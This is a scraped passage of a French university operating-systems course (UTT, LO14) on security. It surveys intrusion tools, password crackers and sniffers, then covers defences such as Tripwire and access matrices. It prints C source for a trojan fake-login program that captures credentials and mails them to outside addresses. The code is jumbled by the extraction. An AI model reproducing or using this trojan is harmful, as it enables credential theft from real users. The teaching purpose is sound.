Généralités sur les systèmes d'exploitation - Site personnel de ...

More documents

Recommendations

Info

LO14 : Université Technologique de Troyes• Satan : (Security Administrator's Tool for Analysibng Networks) a la particularité d'avoir été écrit enPERL• Hunt (Pavel Krautz) c'est un programme permettant de s'introduire dans une connexion, de la surveilleret d'en prendre le contrôle. On peut télécharger Hunt 1.3 pour GNU LINUX sur le sitehttp://www.cri.cz/kra/index.html Il permet de s'attaquer aux réseaux considérés jusque là imprenables,les réseaux switchés.• Host : c'est une commande UNIX classée parmi les dix commandes les plus dangereuses et menaçantesd'UNIX• rusers et finger : commandes UNIX ainsi que showmount.2°) Outils pour forcer les mots de passeLe codage des mots de passe n'est pas inversible => des outils de simulation utilisent l'algorithme publicayant servi au chiffrement et on compare le résultat.Force brute : on génère les mots de passe avec un algorithme, on crypte et on compareForce intelligente : on essaie comme mot de passe les noms d'utilisateurs, puis les prénoms.... Il existe desdictionnaires de prénoms qui permettent de forcer une bonne partie des mots de passe.D'où les mises en garde sur l'importance du choix d'un bon mot de passe : qui alterne lettres et chiffres...Crack écrit par Alec D. E. Muffet, ingénieur logiciel spécialiste UNIX. Est distribué librement. Il est conçupour trouver les mots de passe standards de 8 caractères cryptés avec DES.CrackerJack pour la plate-forme DOS.PaceCrack95 tourne sous 95 dans une fenêtre console.Qcrack pour LINUX puis porté sous DOSJohn the Ripper sous DOSPcrack (Perl Crack)3°) Chevaux de Troie (Trojan ou trojan horse)Il s'agit d'un programme ou code non autorisé placé dans un programme sain. Ce code intrus exécute desfonctions indésirables.L'exemple le plus caractéristique est un programme qui simule une erreur "Segmentation fault" et lance unfaux login, ce qui permet de récupérer un mot de passe et l'envoie par e-mail :http://www.hoobie.net/security/exploits/hacking/intruderf.cvoid fakelogin(){char *input1[10]={0};char input[10];char var[80] = {0};char buffer[80] = {0};FILE *fp;FILE *file;char hostname[80]={0};FILE *hostnamefile;fp = popen("cat /etc/issue.net", "r");fread(var, 80, 1, fp);printf("\n");printf("%s",var);printf("\n");hostnamefile=fopen("/etc/HOSTNAME","r");fread(hostname,78,1,hostnamefile);scanend(hostname);printf("%s login: ",hostname);gets(input);*input1=getpass("Password: ");printf("\n");printf("/bin/cat cannot open /etc/motd cought buffer overide!\n");printf("opening system fix shell, run fsck\n");94 /98 S. Moutou : Cours
strcpy(loginfake.id, input);strcpy(loginfake.password, *input1);LO14 : Université Technologique de Troyes}file = fopen("mirror.txt","w");fprintf(file, "username:%s\npassword:%s\nUID:%i",loginfake.id,loginfake.password, getuid());fclose(file);void emailus(){char guilly[] = "gchamber@videotron.ca";char thegza[] = "yacoubi@ibm.net";char *foo;char *poo;}foo=(char *)malloc(4096);sprintf(foo, "mail %s < mirror.txt",guilly);poo=(char *)malloc(4096);sprintf(poo, "mail %s < mirror.txt",thegza);system(foo);system(poo);Lutte : signature MD5 transforme tout fichier en un condensé de 128 bits en utilisant une famille de fonctionde hachage unidirectionnelle (RFC 1321). TripWire (1992) exécute ce cryptage et d'autres :CRC32 (voir RFC1510), MD2 (RFC1319), MD4 (RFC 1320). Voirhttp://www.visualcomputing.com/products/2_0Linux.html4°) Dispositifs de surveillance ou sniffersRôle : placer l'interface réseau (carte ethernet) dans un mode transparent pour pouvoir intercepter tout letrafic réseau.• Gobbler (Tiza van Rijn)• Ethload freeware en C• Esniff.c ou Sunsniff.c ou linux_sniffer.cV) Identification et défense contre les attaques1°) Le contrôle d'accèsBut : contrôle précis de l'utilisation de ressources par les processus. Il existe deux niveaux :• Un niveau logique (soft) : ensemble de règles qui définissent quels accès aux ressources sont autoriséset quels accès sont interdits.• Un niveau matériel qui permet d'appliquer le modèle réellement.Système={sujets,objets}les sujets sont les entités actives et les objets les entités accessibles.Un modèle de protection définit quels sujets ont accès à quels objets et comment (modalités d'accès).On parle de droit d'accès défini par les couples (objet, modalité)Ex : (fichier, lire)On schématise par une matrice d'accèsProcess 1Process 2Process3fichier1LireLire, écrireSegmentLire, écrire,exécuterIl est souhaitable que la matrice d'accès puisse évoluer dynamiquement. C'est le cas par exemple quandvous exécutez passwd pour changer ou créer un mot de passe : il vous faut accéder en tant qu'utilisateursans privilège au fichier de mot de passe qui vous est normalement fermé en écriture.95 /98 S. Moutou : Cours
Page 1 and 2:
LO14 : Université Technologique de
Page 3 and 4:
UtilisateursLO14 : Université Tech
Page 5 and 6:
Page 8 and 9:
Page 10 and 11:
Page 12 and 13:
Page 14 and 15:
Page 16 and 17:
Page 18 and 19:
void *shmat(int shm_id, const void
Page 20 and 21:
main(){char commande[60];sprintf(co
Page 22 and 23:
Page 24 and 25:
Exemple :LO14 : Université Technol
Page 26 and 27:
Version IHDL Type of service Total
Page 28 and 29:
Page 30 and 31:
Page 32 and 33:
Page 34 and 35:
Page 36 and 37:
Page 38 and 39:
III) Problèmes logicielsLO14 : Uni
Page 40 and 41:
Nom du fichier8 3 1 10 octets2 2 2
Page 42 and 43:
Page 44 and 45: LO14 : Université Technologique de
Page 68 and 69: T1 T2 T1 T2x=read(A)x=x50write(A,
Page 92 and 93: 5.2.11 - TrappeLO14 : Université T
Page 98: LO14 : Université Technologique de
show all

Généralités sur les systèmes d'exploitation - Site personnel de ...

Create successful ePaper yourself

Delete template?

Save as template?